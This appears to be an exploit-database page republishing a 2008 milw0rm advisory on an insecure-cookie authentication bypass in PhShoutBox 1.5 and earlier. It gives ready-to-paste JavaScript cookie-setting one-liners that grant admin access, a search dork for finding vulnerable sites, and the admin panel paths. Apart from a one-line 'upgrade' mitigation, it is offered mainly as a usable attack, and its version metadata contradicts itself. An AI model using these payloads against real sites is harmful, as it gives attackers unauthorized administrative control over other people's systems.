header-logo
Suggest Exploit
vendor:
PhShoutBox
by:
t0pP8uZz
7.5
CVSS
HIGH
Insecure Cookie Handling
N/A
CWE
Product Name: PhShoutBox
Affected Version From: 1.5
Affected Version To: 1.4
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PhShoutBox <= 1.5 (final) Insecure Cookie Handling (Arbitrary Authentication)

PhShoutBox suffers from insecure cookie handling, allowing the remote attacker to craft a cookie that makes the attacker look like a admin, this works because the admin panel only checks the password if a password has been posted using the php vars "$_POST" if POST isnt set, then the cookies will be checked for existance if they exist then it will grant admin. The javascript code below is the easyiesy way to do this, just paste it in your browser whilst at the vulnerable site, then visit "admin.php".

Mitigation:

Upgrade to the latest version of PhShoutBox.
Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+ PhShoutBox <= 1.5 (final) Insecure Cookie Handling (Arbitrary Authentication)  +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz
Discovered On: 18 April 2008
Script Download: http://phphq.net/scripts.php?p=free-scripts&id=2
DORK: inurl:"phshoutbox.php"

Vendor Has Not Been Notified!


DESCRIPTION: 
PhShoutBox suffers from insecure cookie handling, allowing the remote attacker to craft a cookie that 
makes the attacker look like a admin, this works because the admin panel only checks the password
if a password has been posted using the php vars "$_POST" if POST isnt set, then the cookies will be checked
for existance if they exist then it will grant admin.

the javascript code below is the easyiesy way to do this, just paste it in your browser whilst
at the vulnerable site, then visit "admin.php"


Vulnerability:
version 1.5:   javascript:document.cookie = "phadmin=True; path=/;";
version < 1.4: javascript:document.cookie = "ssbadmin=True; path=/;";


NOTE/TIP: 
admin login is at "/admin.php" on 1.5 final
and at "/shoutadmin.php" on 1.4 & below


GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !



--==+================================================================================+==--
--==+ PhShoutBox <= 1.5 (final) Insecure Cookie Handling (Arbitrary Authentication)  +==--
--==+================================================================================+==--

# milw0rm.com [2008-04-18]

Navigation

Suggest Exploit

Services By CQR